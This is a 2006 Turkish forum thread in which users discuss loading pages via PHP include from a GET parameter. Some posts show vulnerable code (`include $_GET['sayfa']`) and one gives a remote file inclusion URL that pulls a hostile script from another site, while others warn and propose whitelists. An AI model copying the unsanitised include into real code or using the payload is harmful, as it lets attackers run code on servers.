• 26-01-2006, 02:32:33
    #1
    index.php?sayfa=deneme.htm

    çok dehşet kafam karıştı nasıl yapıyoduk bunu?

    include örneği yazabilecek varmı?
  • 26-01-2006, 02:38:34
    #2
    Kurumsal PLUS
    <?php include $_GET['sayfa']; ?>
  • 26-01-2006, 02:44:50
    #3
    Kimlik doğrulama veya yönetimden onay bekliyor.
    <?php
    
    $Sayfa = urldecode($_GET['sayfa']);
    if( is_readable($Sayfa) )
    {
      @include($Sayfa);
    }
    else
    {
      echo "Aradığınız sayfa bulunamadı.";
    }
    
    ?>
    Fakat bir öneri, asla bu şekilde kullanmayın. Eğer mutlaka dosya include etmeniz gerekiyorsa, bunu adını GET metodu ile almayın. Aşağıdaki gibi bir örnek daha yararlı olur.
    <?php
    
    $Istek = $_GET['sayfa'];
    
    /* Tanımlı sayfalar */
    $Menu['deneme'] = "deneme.htm";
    $Menu['diger'] = "baska-sayfa.htm";
    
    if( is_readable($Menu[$Istek]) )
    {
      @include($Menu[$Istek]);
    }
    else
    {
      echo "Aradığınız sayfa bulunamadı.";
    }
    
    ?>
    Burada dosya.php?sayfa=deneme şeklinde yazdığınızda deneme.htm sayfasını, dosya.php?sayfa=diger yazdığınızda baska-sayfa.htm dosyasını ekleyecektir.
  • 26-01-2006, 02:47:43
    #4
    çok çok teşekkür ederim zabah beri uuraşiom yws
  • 26-01-2006, 03:19:19
    #5
    Misafir
    bu php karisikmis yav 1 ay icinde ustasi olmam lazim asp perl var ama php yok bende
  • 26-01-2006, 03:39:05
    #6
    yaw banada asp çok zor gelior ama tasarım konusunda asp daha rahat
  • 26-01-2006, 07:38:36
    #7
    Üyeliği durduruldu
    Bartuc adlı üyeden alıntı:
    <?php include $_GET['sayfa']; ?>
    Öneri verirken lütfen dikkat edelim , lamerlara gelin benim sitemi hackleyin diye davetiye çıkarıyor bu kod.

    Bence beyaz liste yöntemi hem güvenli , hemde kullanışlı.

    <?
    $sayfalar = array("index","dosyalar","linkler","calismalar");
    $sayfa = $_GET['sayfa'];
    if(in_array($sayfa,$sayfalar))  {
        include("$sayfa.php");
    } else {
        die("hatali giris");
    }
    ?>
    gibi..
  • 26-01-2006, 09:00:48
    #8
    Kurumsal PLUS
    ne gibi bir saldırı yapabilirlerki bu şekilde?
  • 26-01-2006, 09:16:19
    #9
    Üyeliği durduruldu
    index.php?sayfa=http://www.baskasite.com/hackle.php
    çöker bu şekilde onun için biraz zararlı